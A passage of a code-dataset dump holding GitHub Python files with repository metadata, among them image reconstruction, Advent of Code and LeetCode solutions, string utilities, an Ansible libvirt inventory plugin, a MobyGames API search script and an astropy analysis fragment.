8-bit\")\r\nimutils.imshow(green_rescaled, title = \"Green channel Hann window filtering, cropped and scaled to 8-bit\")\r\nimutils.imshow(blue_rescaled, title = \"Blue channel Hann window filtering, cropped and scaled to 8-bit\")\r\n\r\n#Reconstruct all channels to one image\r\nprint(\"Hann window ramp filtered reconstruction complete.\\n\\n\")\r\nimage_hann=np.dstack((red_rescaled,green_rescaled,blue_rescaled))\r\nimutils.imshow(image_hann, title = \"Reconstruction with Hann windowed ramp filtering\")\r\n\r\n# Calculate the mean squared error and display absolute difference between Hamming and Hann\r\nprint(\"Mean squared error between Hamming and Hann windowed ramp filters: \")\r\nprint(mse(image_hamming, image_hann))\r\nimage_diff = abs(image_hamming - image_hann)\r\nimutils.imshow(image_diff, title = \"Pixels differences between Hamming and Hann filter reconstruction\")\r\n","repo_name":"RaymondMcCreesh/Sinogram","sub_path":"Sinogram.py","file_name":"Sinogram.py","file_ext":"py","file_size_in_byte":11958,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"11138538087","text":"\"\"\"\nWrite a Python program to 
draw a line using given axis values\n with suitable label in the x axis , y axis and a title\n\"\"\"\n\nimport matplotlib.pyplot as plt\n\nX = range(1, 25)\nY = [value ** 2 for value in X]\n\nprint(\"Values of X:\")\nprint(*range(1,25))\n\nprint(\"Values of Y (Sqaure of X):\")\nprint(Y)\n\nplt.plot(X, Y, color = 'Red', linewidth = 2, linestyle = 'dotted')\n\nplt.xlabel('x - axis')\nplt.ylabel('y - axis')\nplt.title('Draw a line.')\n\nplt.show()","repo_name":"Vijendrapratap/Machine-Learning","sub_path":"Week4/Matplotlib/Matplotlib/2.WAP to draw a line using given axis values with suitable label in the x axis , y axis and a title.py","file_name":"2.WAP to draw a line using given axis values with suitable label in the x axis , y axis and a title.py","file_ext":"py","file_size_in_byte":450,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"71034767844","text":"\"\"\"--- Day 5: Supply Stacks ---\nThe expedition can depart as soon as the final supplies have been unloaded from the ships. Supplies are stored in stacks of marked crates, but because the needed supplies are buried under many other crates, the crates need to be rearranged.\n\nThe ship has a giant cargo crane capable of moving crates between stacks. To ensure none of the crates get crushed or fall over, the crane operator will rearrange them in a series of carefully-planned steps. After the crates are rearranged, the desired crates will be at the top of each stack.\n\nThe Elves don't want to interrupt the crane operator during this delicate procedure, but they forgot to ask her which crate will end up where, and they want to be ready to unload them as soon as possible so they can embark.\n\nThey do, however, have a drawing of the starting stacks of crates and the rearrangement procedure (your puzzle input). For example:\n\n [D] \n[N] [C] \n[Z] [M] [P]\n 1 2 3 \n\nmove 1 from 2 to 1\nmove 3 from 1 to 3\nmove 2 from 2 to 1\nmove 1 from 1 to 2\nIn this example, there are three stacks of crates. Stack 1 contains two crates: crate Z is on the bottom, and crate N is on top. Stack 2 contains three crates; from bottom to top, they are crates M, C, and D. Finally, stack 3 contains a single crate, P.\n\nThen, the rearrangement procedure is given. In each step of the procedure, a quantity of crates is moved from one stack to a different stack. In the first step of the above rearrangement procedure, one crate is moved from stack 2 to stack 1, resulting in this configuration:\n\n[D] \n[N] [C] \n[Z] [M] [P]\n 1 2 3 \nIn the second step, three crates are moved from stack 1 to stack 3. Crates are moved one at a time, so the first crate to be moved (D) ends up below the second and third crates:\n\n [Z]\n [N]\n [C] [D]\n [M] [P]\n 1 2 3\nThen, both crates are moved from stack 2 to stack 1. 
Again, because crates are moved one at a time, crate C ends up below crate M:\n\n [Z]\n [N]\n[M] [D]\n[C] [P]\n 1 2 3\nFinally, one crate is moved from stack 1 to stack 2:\n\n [Z]\n [N]\n [D]\n[C] [M] [P]\n 1 2 3\nThe Elves just need to know which crate will end up on top of each stack; in this example, the top crates are C in stack 1, M in stack 2, and Z in stack 3, so you should combine these together and give the Elves the message CMZ.\"\"\"\n\n# change to directory of this file\nimport os\nos.chdir(os.path.dirname(os.path.abspath(__file__)))\n\n# read input\nwith open('input.txt') as f:\n\tinput = f.read()\n\n# split input into initial state and instructions\ninitial_state, instructions = input.split('\\n\\n')\n\n# parse initial state\nstacks = []\n# for each line but the last one\nfor line in initial_state.splitlines()[:-1]:\n\t# iterate over characters and detect current stack using current index of line\n\tstack = []\n\n\t# start index = 1\n\ti = 1\n\t# iterate to end of line - 1 from i\n\twhile i < len(line) - 1:\n\t\t# get current stack\n\t\tcurrent_stack = (i - 1) // 4\n\n\t\t# if current stack is not in stacks\n\t\tif current_stack >= len(stacks):\n\t\t\t# add new stack to stacks\n\t\t\tstacks.append([])\n\n\t\t# if character is not a space\n\t\tif line[i] != ' ':\n\n\t\t\t# add character to current stack\n\t\t\tstacks[current_stack].append(line[i])\n\n\t\ti += 4\n\n# print initial state\nprint('Initial state:')\nfor stack in stacks:\n\tprint(stack)\n\n\n# parse instructions (amount, from_number, to_number)\ninstructions = [(instruction.split()[1::2]) for instruction in instructions.splitlines()]\n\n# print instructions\nprint('Instructions:')\nfor instruction in instructions:\n\tprint(instruction)\n\n# execute instructions\nfor instruction in instructions:\n\t# get amount, from_number and to_number\n\tamount, from_number, to_number = instruction\n\n\t# convert to int\n\tamount = int(amount)\n\tfrom_number = int(from_number)\n\tto_number = int(to_number)\n\n\t# get crates from the stack at from_number - 1 and remove them from the stack\n\tcrates = stacks[from_number - 1][:amount]\n\n\t# remove crates from stack at from_number - 1\n\tstacks[from_number - 1] = stacks[from_number - 1][amount:]\n\tprint(stacks[from_number - 1])\n\t\n\t# add crates to to_number - 1 stack by adding them to the beginning of the stack but reversed\n\tstacks[to_number - 1] = crates[::-1] + stacks[to_number - 1]\n\n# # print final state\n# print('Final state:')\n# for stack in stacks:\n# \tprint(stack)\n\n# print result\nprint('Result:')\nprint(''.join([stack[0] for stack in stacks]))","repo_name":"Lefted/Advent-of-Code-2022","sub_path":"5/5a.py","file_name":"5a.py","file_ext":"py","file_size_in_byte":4438,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"4002379659","text":"\r\nimport re\r\n\r\n_iterativePartRgx = re.compile('_\\d+_(?=\\D)|\\d+$')\r\n_trailingNumRgx = re.compile('([0-9]+)$')\r\n_interBracketsRgx = re.compile(r'{([^{}]*?)}')\r\n\r\n#-------------------------------------------------------------------------------\r\n# strings manipulation utilities\r\n#-------------------------------------------------------------------------------\r\n\r\ndef upperFirst(w):\r\n return w[0].upper() + w[1:]\r\n\r\ndef lowerFirst(w):\r\n return w[0].lower() + w[1:]\r\n\r\ndef wordSplit(s, digits=False):\r\n '''\r\n Author: http://stackoverflow.com/users/1850574/jdavidls\r\n \r\n A very 'low level' implementation of a simple state machine (bitfield 
state machine).\r\n This is not an elegant method and possibly the most anti-pythonic mode to resolve this. \r\n However, 're' module also implements a too complex state machine to resolve this simple task.\r\n \r\n state bits:\r\n 0: no yields\r\n 1: lower yields\r\n 2: lower yields - 1\r\n 4: upper yields\r\n 8: digit yields\r\n 16: other yields\r\n 32 : upper sequence mark\r\n '''\r\n\r\n digit_state_test = 8 if digits else 0\r\n si, ci, state = 0, 0, 0 # start_index, current_index\r\n\r\n for c in s:\r\n\r\n if c.islower():\r\n if state & 1:\r\n yield s[si:ci]\r\n si = ci\r\n elif state & 2:\r\n yield s[si:ci - 1]\r\n si = ci - 1\r\n state = 4 | 8 | 16\r\n ci += 1\r\n\r\n elif c.isupper():\r\n if state & 4:\r\n yield s[si:ci]\r\n si = ci\r\n if state & 32:\r\n state = 2 | 8 | 16 | 32\r\n else:\r\n state = 8 | 16 | 32\r\n\r\n ci += 1\r\n\r\n elif c.isdigit():\r\n if state & digit_state_test:\r\n yield s[si:ci]\r\n si = ci\r\n state = 1 | 4 | 16\r\n ci += 1\r\n\r\n else:\r\n if state & 16:\r\n yield s[si:ci]\r\n state = 0\r\n ci += 1 # eat ci\r\n si = ci\r\n # print(' : ', c, bin(state))\r\n if state:\r\n yield s[si:ci]\r\n\r\ndef labelify(s):\r\n return \" \".join((upperFirst(w) for w in wordSplit(s)))\r\n\r\ndef underJoin(iterable):\r\n\r\n if isinstance(iterable, basestring):\r\n return iterable\r\n\r\n return \"_\".join(iterable)\r\n\r\ndef camelJoin(iterable):\r\n\r\n if isinstance(iterable, basestring):\r\n return iterable\r\n\r\n return \"\".join((upperFirst(w) if i > 0 else w.lower() for i, w in enumerate(iterable)))\r\n\r\n\r\ndef findFields(s):\r\n return _interBracketsRgx.findall(s)\r\n\r\ndef padded(i, padding=3):\r\n return \"{0:0{1}d}\".format(i, padding)\r\n\r\ndef getNumPart(in_sName, **kwargs):\r\n\r\n bAsStr = kwargs.get(\"asString\", False)\r\n sPart = kwargs.get(\"part\", \"iterative\")\r\n\r\n if sPart == \"trailing\":\r\n rgx = _trailingNumRgx\r\n elif sPart == \"iterative\":\r\n rgx = _iterativePartRgx\r\n else:\r\n raise ValueError('Invalid value for \"part\" kwarg : \"{0}\". 
\\\r\n Must be \"iterative\" or \"trailing\".'.format(sPart))\r\n\r\n try:\r\n sIter = rgx.findall(in_sName)[-1]\r\n except IndexError:\r\n return '' if bAsStr else 0\r\n\r\n sIter = sIter.strip('_')\r\n\r\n if bAsStr:\r\n return sIter\r\n else:\r\n return int(sIter)\r\n\r\ndef getIteration(in_sName, **kwargs):\r\n return getNumPart(in_sName, part=\"iterative\", **kwargs)\r\n\r\ndef getTrailingNum(in_sName, **kwargs):\r\n return getNumPart(in_sName, part=\"trailing\", **kwargs)\r\n\r\n\r\n","repo_name":"sebcourtois/cg-pypeline-toolkit","sub_path":"pytk/util/strutils.py","file_name":"strutils.py","file_ext":"py","file_size_in_byte":3523,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"72789728485","text":"# Faça um programa que receba um número.\n# Verifique se o número informado é par ou ímpar.\n# Exiba o resultado da seguinte maneira:\n\n# \tO número x é impar\n# ou\n# \tO número x é par\n\nnumero = int(input(\"Entre com um número: \"))\n\nif numero % 2 == 0:\n print(f\"O número {numero} é par!\")\nelse:\n print(f\"O número {numero} é ímpar!\")","repo_name":"TeoMeWhy/introducao-programacao-python","sub_path":"dia02/exercicios/ex1.8.py","file_name":"ex1.8.py","file_ext":"py","file_size_in_byte":347,"program_lang":"python","lang":"pt","doc_type":"code","stars":22,"dataset":"github-code","pt":"52"} +{"seq_id":"12512929115","text":"from __future__ import with_statement\n\n# pylint: disable=g-bad-name\nimport copy\nimport json\nimport logging\nimport urllib\nimport urlparse\nimport zlib\n\nimport util\n\n\nclass ApiRequest(object):\n \"\"\"Simple data object representing an API request.\n\n Parses the request from environment variables into convenient pieces\n and stores them as members.\n \"\"\"\n def __init__(self, environ, base_paths=None):\n \"\"\"Constructor.\n\n Args:\n environ: An environ dict for the request as defined in PEP-333.\n\n Raises:\n ValueError: If the path for the request is invalid.\n \"\"\"\n self.headers = util.get_headers_from_environ(environ)\n self.http_method = environ['REQUEST_METHOD']\n self.url_scheme = environ['wsgi.url_scheme']\n self.server = environ['SERVER_NAME']\n self.port = environ['SERVER_PORT']\n self.path = environ['PATH_INFO']\n self.query = environ.get('QUERY_STRING')\n self.body = environ['wsgi.input'].read()\n if self.body and self.headers.get('CONTENT-ENCODING') == 'gzip':\n # Increasing wbits to 16 + MAX_WBITS is necessary to be able to decode\n # gzipped content (as opposed to zlib-encoded content).\n # If there's an error in the decompression, it could be due to another\n # part of the serving chain that already decompressed it without clearing\n # the header. 
If so, just ignore it and continue.\n try:\n self.body = zlib.decompress(self.body, 16 + zlib.MAX_WBITS)\n except zlib.error:\n pass\n self.source_ip = environ.get('REMOTE_ADDR')\n self.relative_url = self._reconstruct_relative_url(environ)\n\n if not base_paths:\n base_paths = set()\n elif isinstance(base_paths, list):\n base_paths = set(base_paths)\n\n # Find a base_path in the path\n for base_path in base_paths:\n if self.path.startswith(base_path):\n self.path = self.path[len(base_path):]\n self.base_path = base_path\n break\n else:\n raise ValueError('Invalid request path: %s' % self.path)\n\n if self.query:\n self.parameters = urlparse.parse_qs(self.query, keep_blank_values=True)\n else:\n self.parameters = {}\n self.body_json = self._process_req_body(self.body) if self.body else {}\n self.request_id = None\n\n # Check if it's a batch request. We'll only handle single-element batch\n # requests on the dev server (and we need to handle them because that's\n # what RPC and JS calls typically show up as). Pull the request out of the\n # list and record the fact that we're processing a batch.\n if isinstance(self.body_json, list):\n if len(self.body_json) != 1:\n logging.warning('Batch requests with more than 1 element aren\\'t '\n 'supported in devappserver2. Only the first element '\n 'will be handled. Found %d elements.',\n len(self.body_json))\n else:\n logging.info('Converting batch request to single request.')\n self.body_json = self.body_json[0]\n self.body = json.dumps(self.body_json)\n self._is_batch = True\n else:\n self._is_batch = False\n\n def _process_req_body(self, body):\n \"\"\"Process the body of the HTTP request.\n\n If the body is valid JSON, return the JSON as a dict.\n Else, convert the key=value format to a dict and return that.\n\n Args:\n body: The body of the HTTP request.\n \"\"\"\n try:\n return json.loads(body)\n except ValueError:\n return urlparse.parse_qs(body, keep_blank_values=True)\n\n def _reconstruct_relative_url(self, environ):\n \"\"\"Reconstruct the relative URL of this request.\n\n This is based on the URL reconstruction code in Python PEP 333:\n http://www.python.org/dev/peps/pep-0333/#url-reconstruction. Rebuild the\n URL from the pieces available in the environment.\n\n Args:\n environ: An environ dict for the request as defined in PEP-333.\n\n Returns:\n The portion of the URL from the request after the server and port.\n \"\"\"\n url = urllib.quote(environ.get('SCRIPT_NAME', ''))\n url += urllib.quote(environ.get('PATH_INFO', ''))\n if environ.get('QUERY_STRING'):\n url += '?' 
+ environ['QUERY_STRING']\n return url\n\n def copy(self):\n return copy.deepcopy(self)\n\n def is_rpc(self):\n # Google's JsonRPC protocol creates a handler at /rpc for any Cloud\n # Endpoints API, with api name, version, and method name being in the\n # body of the request.\n # If the request is sent to /rpc, we will treat it as JsonRPC.\n # The client libraries for iOS's Objective C use RPC and not the REST\n # versions of the API.\n return self.path == 'rpc'\n\n def is_batch(self):\n return self._is_batch\n","repo_name":"kiwibrowser/src","sub_path":"third_party/catapult/third_party/google-endpoints/endpoints/api_request.py","file_name":"api_request.py","file_ext":"py","file_size_in_byte":4666,"program_lang":"python","lang":"en","doc_type":"code","stars":2475,"dataset":"github-code","pt":"52"} +{"seq_id":"38382548653","text":"import numpy as np\nfrom paddle import fluid\nfrom paddle.fluid.dygraph import to_variable\n\n__all__ = [\"SegmentationMetrics\"]\n\n\nclass SegmentationMetrics(object):\n def __init__(self,\n ncls: int = 0,\n ignore_label: int = 0,\n eps: float = 1e-8):\n \"\"\"\n See https://arxiv.org/pdf/1704.06857.pdf.\n @param\n ncls: Range must be continuous.\n \"\"\"\n self.eps = eps\n self.ncls = ncls\n self.ignore_label = ignore_label\n\n def update(self, ncls, ignore_label):\n assert ncls >= 1 and ignore_label >= 0\n self.ncls = ncls\n self.ignore_label = ignore_label\n\n def __call__(self, predict: fluid.Variable, target: fluid.Variable):\n \"\"\"\n predict: [N, C, H, W]\n target: [N, H, W]\n \"\"\"\n\n # 1. check\n assert predict is not None and target is not None\n predict = fluid.layers.argmax(predict, axis=1)\n\n miou, out_wrong, out_correct = fluid.layers.mean_iou(\n predict, target, self.ncls)\n\n\n return miou, out_wrong, out_correct\n\n\nif __name__ == \"__main__\":\n\n np.random.seed(2020)\n\n xmin, ymin = 4, 5\n xmax, ymax = 12, 12\n\n n, c, h, w = 5, 8, 20, 20\n ignore_class = 0\n true_class = 6\n\n pred = np.random.normal(size=(n, c, h, w))\n pred_max = np.max(pred)\n\n target = np.random.randint(\n ignore_class+1, c, size=(n, h, w), dtype=np.int64)\n\n pred1 = pred.copy()\n # pred1[..., nd_range] = true_class\n pred1[..., true_class, ymin: ymax, xmin: xmax] = pred_max + 0.1\n target1 = target.copy()\n target1[..., ymin: ymax, xmin: xmax] = true_class\n\n pred2 = pred.copy()\n pred2[..., true_class, ymin: ymax, xmin: xmax] = pred_max + 0.1\n target2 = target.copy()\n target2[..., ymin: ymax, xmin: xmax] = c - true_class\n\n seg_metrics = SegmentationMetrics(c)\n\n with fluid.dygraph.guard():\n pred = to_variable(pred)\n target = to_variable(target)\n info = seg_metrics(pred, target)\n print(*info)\n\n pred = to_variable(pred1)\n target = to_variable(target1)\n info = seg_metrics(pred, target)\n print(*info)\n\n pred = to_variable(pred2)\n target = to_variable(target2)\n info = seg_metrics(pred, target)\n print(*info)\n","repo_name":"yangyangyangGen/Semantic_segmentation_baseline","sub_path":"undone/metrics_matrix_paddle.py","file_name":"metrics_matrix_paddle.py","file_ext":"py","file_size_in_byte":2329,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"74292124644","text":"'''\n정수 A를 B로 바꾸려고 한다. 가능한 연산은 다음과 같은 두 가지이다.\n- 2를 곱한다.\n- 1을 수의 가장 오른쪽에 추가한다. 
\nA를 B로 바꾸는데 필요한 연산의 최솟값을 구해보자.\n'''\n\na,b = map(int, input().split())\ncnt = 1\nwhile b!=a:\n cnt+=1\n tmp=b\n if b%10 ==1:\n b//=10\n elif b%2==0:\n b//=2\n \n if tmp==b:\n print(-1)\n break\nelse:\n print(cnt)","repo_name":"MaiBoii/Algorithm_Study","sub_path":"CLASS4/16953_A->B.py","file_name":"16953_A->B.py","file_ext":"py","file_size_in_byte":447,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"12902831169","text":"from __future__ import (absolute_import, division, print_function)\n__metaclass__ = type\n\nDOCUMENTATION = r'''\nname: libvirt\nplugin_type: inventory\nextends_documentation_fragment:\n - constructed\nshort_description: Libvirt inventory source\ndescription:\n - Get libvirt guests in an inventory source\nauthor:\n - Dave Olsthoorn \nversion_added: \"2.10\"\noptions:\n plugin:\n description: Token that ensures this is a source file for the 'libvirt' plugin.\n required: True\n choices: ['libvirt']\n uri:\n description: Libvirt Connection URI\n required: True\n type: str\n inventory_hostname:\n description: |\n What to register as the inventory hostname.\n If set to 'uuid' the uuid of the server will be used and a\n group will be created for the server name.\n If set to 'name' the name of the server will be used unless\n there are more than one server with the same name in which\n case the 'uuid' logic will be used.\n Default is to do 'name'\n type: string\n choices:\n - name\n - uuid\n default: \"name\"\nrequirements:\n - \"libvirt-python\"\n'''\n\nEXAMPLES = r'''\n# Connect to lxc host\nplugin: community.libvirt.libvirt\nuri: 'lxc:///'\n\n# Connect to qemu\nplugin: community.libvirt.libvirt\nuri: 'qemu:///system'\n'''\n\nfrom ansible.plugins.inventory import BaseInventoryPlugin, Constructable\nfrom ansible.errors import AnsibleError\n\ntry:\n import libvirt\nexcept ImportError:\n raise AnsibleError('the libvirt inventory plugin requires libvirt-python.')\n\n\nclass InventoryModule(BaseInventoryPlugin, Constructable):\n NAME = 'community.libvirt.libvirt'\n\n def parse(self, inventory, loader, path, cache=True):\n super(InventoryModule, self).parse(\n inventory,\n loader,\n path,\n cache=cache\n )\n\n config_data = self._read_config_data(path)\n\n # set _options from config data\n self._consume_options(config_data)\n\n uri = self.get_option('uri')\n if not uri:\n raise AnsibleError(\"hypervisor uri not given\")\n\n connection = libvirt.open(uri)\n if not connection:\n raise AnsibleError(\"hypervisor connection failure\")\n\n # TODO(daveol)\n # make using connection plugins optional\n connection_plugin = dict({\n 'LXC': 'community.libvirt.libvirt_lxc',\n 'QEMU': 'community.libvirt.libvirt_qemu'\n }).get(connection.getType())\n\n for server in connection.listAllDomains():\n inventory_hostname = dict({\n 'uuid': server.UUIDString(),\n 'name': server.name()\n }).get(\n self.get_option('inventory_hostname')\n )\n\n inventory_hostname_alias = dict({\n 'name': server.UUIDString(),\n 'uuid': server.name()\n }).get(\n self.get_option('inventory_hostname')\n )\n\n # TODO(daveol): Fix \"Invalid characters were found in group names\"\n # This warning is generated because of uuid's\n self.inventory.add_host(inventory_hostname)\n self.inventory.add_group(inventory_hostname_alias)\n self.inventory.add_child(inventory_hostname_alias, inventory_hostname)\n\n if connection_plugin is not None:\n self.inventory.set_variable(\n inventory_hostname,\n 'ansible_libvirt_uri',\n uri\n )\n self.inventory.set_variable(\n 
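The Baekjoon 16953 solution just above (its Korean docstring says: turn integer A into B using only "multiply by 2" or "append the digit 1 on the right", and report the minimum count) works backwards from B, undoing whichever operation B's last digit admits. A hedged restatement with an explicit infeasibility guard added for clarity; min_ops is an illustrative name, not from the submission:

def min_ops(a: int, b: int) -> int:
    count = 1                    # like the submission, counts operations plus one
    while b != a:
        if b % 10 == 1:          # undo "append digit 1"
            b //= 10
        elif b % 2 == 0:         # undo "multiply by 2"
            b //= 2
        else:
            return -1            # neither operation is reversible here
        if b < a:
            return -1            # backward steps only shrink b, so a is unreachable
        count += 1
    return count

assert min_ops(2, 162) == 5      # 2 -> 4 -> 8 -> 81 -> 162
assert min_ops(4, 42) == -1      # 42 -> 21 -> 2, which undershoots 4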
inventory_hostname,\n 'ansible_connection',\n connection_plugin\n )\n\n # Get variables for compose\n variables = self.inventory.hosts[inventory_hostname].get_vars()\n\n # Set composed variables\n self._set_composite_vars(\n self.get_option('compose'),\n variables,\n inventory_hostname,\n self.get_option('strict'),\n )\n\n # Add host to composed groups\n self._add_host_to_composed_groups(\n self.get_option('groups'),\n variables,\n inventory_hostname,\n self.get_option('strict'),\n )\n\n # Add host to keyed groups\n self._add_host_to_keyed_groups(\n self.get_option('keyed_groups'),\n variables,\n inventory_hostname,\n self.get_option('strict'),\n )\n","repo_name":"varungarg26/monitor-me","sub_path":"venv/lib/python3.9/site-packages/ansible_collections/community/libvirt/plugins/inventory/libvirt.py","file_name":"libvirt.py","file_ext":"py","file_size_in_byte":4644,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"2140453033","text":"\"\"\"R-7.11: Implement a function, with calling syntax ``max(L)``, that returns the maximum element\n from a ``PositionalList`` instance ``L`` containing comparable elements.\"\"\"\nimport random\n\nfrom Goodrich.Chapter7.positional_list import PositionalList\n\n\ndef Max(L: PositionalList):\n m = 0\n q = L.after(L.first())\n for p in L:\n if (p > q.element()) and (p > m) and (q is not None):\n m = p\n q = L.after(q)\n return m\n\n\n# Instantiate doubly linked list and populate incrementally from 1 to 10.\ndbll = PositionalList()\n# noinspection PyProtectedMember\ncur = dbll._header\nfor i in range(1, 11):\n # noinspection PyProtectedMember\n dbll._insert_between(i, cur, dbll._trailer)\n cur = cur.next\n\n# Get max item.\nprint(Max(dbll))\n\n# Also: PositionalList class already defines an iterable generator, simply call inbuilt max function.\nprint(max(dbll))\n\n# Let's try that again with numbers from 1 to 10.\ndbll = PositionalList()\n# noinspection PyProtectedMember\ncur = dbll._header\nfor i in random.sample(range(1, 11), 10):\n # noinspection PyProtectedMember\n dbll._insert_between(i, cur, dbll._trailer)\n cur = cur.next\nprint(Max(dbll))\nprint(max(dbll))\n","repo_name":"awwalm/DSAlgoPy","sub_path":"Goodrich/Chapter7/Exercises/Reinforcement/R-7_11.py","file_name":"R-7_11.py","file_ext":"py","file_size_in_byte":1194,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"52"} +{"seq_id":"33861255832","text":"\"\"\"\n1457. Pseudo-Palindromic Paths in a Binary Tree\nhttps://leetcode.com/problems/pseudo-palindromic-paths-in-a-binary-tree/\n\nGiven a binary tree where node values are digits from 1 to 9. A path in the binary tree is said to be pseudo-palindromic if at least one permutation of the node values in the path is a palindrome.\n\nReturn the number of pseudo-palindromic paths going from the root node to leaf nodes.\n\n \n\nExample 1:\n\n\nInput: root = [2,3,1,3,1,null,1]\nOutput: 2 \nExplanation: The figure above represents the given binary tree. There are three paths going from the root node to leaf nodes: the red path [2,3,3], the green path [2,1,1], and the path [2,3,1]. 
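The hand-rolled Max in the R-7.11 record above threads a second cursor through the list and seeds the maximum with m = 0, which would misbehave on all-negative inputs. Since the exercise itself notes that PositionalList is iterable (it calls the built-in max(dbll)), a simpler sketch of the same exercise is:

def list_max(L):
    """Return the largest element of a non-empty PositionalList L."""
    it = iter(L)                 # PositionalList yields its elements in order
    best = next(it)
    for item in it:
        if item > best:
            best = item
    return best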
Among these paths only red path and green path are pseudo-palindromic paths since the red path [2,3,3] can be rearranged in [3,2,3] (palindrome) and the green path [2,1,1] can be rearranged in [1,2,1] (palindrome).\n\"\"\"\n\n# Definition for a binary tree node.\n# class TreeNode:\n# def __init__(self, val=0, left=None, right=None):\n# self.val = val\n# self.left = left\n# self.right = right\nclass Solution:\n def pseudoPalindromicPaths (self, root: TreeNode) -> int:\n \n def dfs(root, count=0):\n if not root: return 0\n count ^= 1 << (root.val - 1)\n res = dfs(root.left, count) + dfs(root.right, count)\n if root.left == root.right:\n if count & (count - 1) == 0:\n res += 1\n return res\n \n return dfs(root)\n\n","repo_name":"EvanTian233/Leetcode-solutions","sub_path":"Python_Solutions/Algorithms/3_1_DFS/PseudoPalindromicPaths.py","file_name":"PseudoPalindromicPaths.py","file_ext":"py","file_size_in_byte":1508,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"24998889430","text":"#! /usr/bin/env python3\n'''\nSearch MobyGames for a given game\n'''\n\n# imports\nfrom json import loads as jloads\nfrom urllib.parse import quote\nfrom urllib.request import Request, urlopen\nimport argparse\n\n# constants\nBASE_URL = 'https://api.mobygames.com/v1/games'\nUSER_AGENT = 'Mozilla/5.0 (Windows NT 6.1; Win64; x64)'\nMIN_YEAR = 0\nMAX_YEAR = 2100\nPLATFORM_ID = {\n 'GB': 10,\n 'GBA': 12,\n 'GBC': 11,\n 'GC': 14,\n 'N64': 9,\n 'PSX': 6,\n 'PS2': 7,\n 'PS3': 81,\n 'PSP': 46,\n 'Switch': 203,\n 'Wii': 132,\n 'XBOX': 13,\n 'XBOX360': 69,\n}\n\n# main program\nif __name__ == \"__main__\":\n # parse user args\n parser = argparse.ArgumentParser(description=__doc__, formatter_class=argparse.ArgumentDefaultsHelpFormatter)\n parser.add_argument('-k', '--api_key', required=True, type=str, help=\"MobyGames API Key\")\n parser.add_argument('-t', '--title', required=False, type=str, default=None, help=\"Title\")\n parser.add_argument('-p', '--platform', required=False, type=str, default=None, help=\"Platform (options: %s)\" % ', '.join(sorted(PLATFORM_ID.keys())))\n parser.add_argument('-o', '--output', required=False, type=str, default='stdout', help=\"Output File (TSV)\")\n args = parser.parse_args(); url = BASE_URL\n\n # parse API key\n if not args.api_key.startswith('moby_'):\n raise ValueError(\"Invalid API Key (must start with 'moby_'): %s\" % args.api_key)\n url += ('?api_key=%s' % args.api_key)\n\n # parse title\n if args.title is not None:\n url += ('&title=%s' % quote(args.title, safe=''))\n\n # parse platform\n if args.platform is not None:\n try:\n url += ('&platform=%d' % PLATFORM_ID[args.platform.strip().upper()])\n except:\n raise ValueError(\"Invalid platform: %s\" % args.platform)\n\n # search MobyGames\n req = Request(url, data=None, headers={'User-Agent':USER_AGENT})\n data = jloads(urlopen(req).read())\n if args.output.strip().lower() == 'stdout':\n from sys import stdout as out_f\n else:\n out_f = open(args.output, 'w')\n out_f.write('Title\\tRelease Date\\tPlatform\\tGenre\\tDescription (HTML)\\n')\n for game_data in data['games']:\n out_f.write(game_data['title'])\n out_f.write('\\t%s\\t%s' % sorted((curr['first_release_date'].strip(),curr['platform_name'].strip()) for curr in game_data['platforms'])[0])\n out_f.write('\\t%s' % ', '.join(sorted(curr['genre_name'] for curr in game_data['genres'])))\n out_f.write('\\t')\n if 'description' in game_data and game_data['description'] is not None:\n out_f.write('\\t%s' % 
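The LeetCode 1457 solution above compresses the whole root-to-leaf path into one integer: count ^= 1 << (root.val - 1) toggles a per-digit parity bit, and count & (count - 1) == 0 tests that at most one digit occurs an odd number of times (the palindrome-permutation condition). The same two bit tricks in isolation, outside the tree context:

def parity_mask(digits):
    mask = 0
    for d in digits:              # digits are 1..9, so bits 0..8
        mask ^= 1 << (d - 1)      # flip this digit's odd/even-count bit
    return mask

def is_pseudo_palindrome(digits):
    m = parity_mask(digits)
    return m & (m - 1) == 0       # zero or a power of two: at most one odd count

assert is_pseudo_palindrome([2, 3, 3])      # can be rearranged to 3,2,3
assert is_pseudo_palindrome([2, 1, 1])      # can be rearranged to 1,2,1
assert not is_pseudo_palindrome([2, 3, 1])  # all three counts are odd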
game_data['description'].replace('\\n','').strip())\n out_f.write('\\n')\n out_f.close()\n","repo_name":"niemasd/GameDB","sub_path":"helper/search_mobygames.py","file_name":"search_mobygames.py","file_ext":"py","file_size_in_byte":2738,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"52"} +{"seq_id":"13498464332","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Sun Feb 25 14:26:04 2018\r\n\r\n@author: Ashvini\r\n\"\"\"\r\n\r\nfrom astropy.io import fits\r\nfrom astropy.io import ascii\r\nfrom astropy.table import Table\r\nimport numpy as np\r\nfrom astropy.cosmology import LambdaCDM\r\nfrom astropy import units as u\r\nimport matplotlib.pyplot as plt\r\nfrom matplotlib.gridspec import GridSpec\r\n\r\nlab = fits.open('lab1-data.fits')\r\ndata = Table(lab[1].data)\r\n\r\ndata2 = Table(lab[1].data)\r\ndata2.remove_column('REDSHIFT')\r\n\r\ndata2['name'] = np.arange(len(data))\r\nsearch = data2[('name','RA','DEC')]\r\n\r\nascii.write(data, 'data.txt', overwrite = True)\r\nascii.write(search, 'data2.txt', overwrite = True)\r\n\r\nsdss = ascii.read('star_data.csv')\r\n\r\ni = 0\r\nwhile i < len(data2):\r\n if data2['name'][i] not in sdss['NAME']:\r\n data.remove_row(i)\r\n i+=1\r\n \r\ncosmo = LambdaCDM(H0=70 * u.km / u.s / u.Mpc, Om0=0.3, Ode0=0.7)\r\n\r\nluminosity_distances = []\r\nfor r in 